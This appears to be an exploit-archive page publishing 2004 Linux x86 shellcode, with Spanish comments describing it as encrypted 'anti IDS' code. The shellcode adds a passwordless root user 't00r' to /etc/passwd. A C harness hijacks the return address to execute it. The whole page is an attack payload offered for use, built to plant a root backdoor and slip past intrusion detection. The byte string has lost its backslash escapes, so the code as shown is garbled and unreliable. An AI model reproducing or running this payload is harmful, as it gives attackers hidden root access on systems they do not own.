[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : linux/x86 add user t00r ENCRYPT 116 bytes
# Published : 2004-09-26
# Author : Matias Sedalo
# Previous Title : linux/x86 portbind port 5074 toupper 226 bytes
# Next Title : linux/x86 chmod 666 shadow ENCRYPT 75 bytes


/*
 * !!!!!! ANTI IDS SHELLCODE !!!!!!
 *
 * s0t4ipv6@shellcode.com.ar
 * 0x14abril0x7d2
 *
 * !!!!! ENCRIPTADA !!!!!

 * 116 bytes	
 * Agrega la linea "t00r::0:0::/:/bin/sh" en /etc/passwd

 * !!!!! ENCRIPTADA !!!!!
 *
 * Para mas informacion
 * Descargue http://www.shellcode.com.ar/Projects/JempiScodes(version).tgz
 *
 * !!!!!! ANTI IDS SHELLCODE !!!!!!
*/

#include <stdio.h>

char shellcode[]=
"xebx1bx5fx31xc0x6ax28x6ax52x59x49x5bx8ax04x0f"
"xf6xd3x30xd8x88x04x0fx50x85xc9x75xefxebx05xe8"
"xe0xffxffxffx0ex6fxc7xe4xffxfbxecxf3xf4xb3xa0"
"xeexf6xb8xffxb5xeex02x95x91x3axb5x70x32xbax37"
"xb2xf6xb5xbbxb2x04x07x86x5cx21xb2x2exc6xf9xbe"
"xa3xe4xffxadxeaxb2xf4xfexa7xf5xffxeaxb8xadxff"
"xf5xf5xadxe3xbbxffxbdx3fx59x66x33xbax72x97xd3"
"xb2x4ex0ex8fx49x34xb2x3fx72xb2x57";

main() {
        int *ret;
        ret=(int *)&ret+2;
        printf("Shellcode lenght=%dn",strlen(shellcode));
        (*ret) = (int)shellcode;
}

// www.Syue.com [2004-09-26]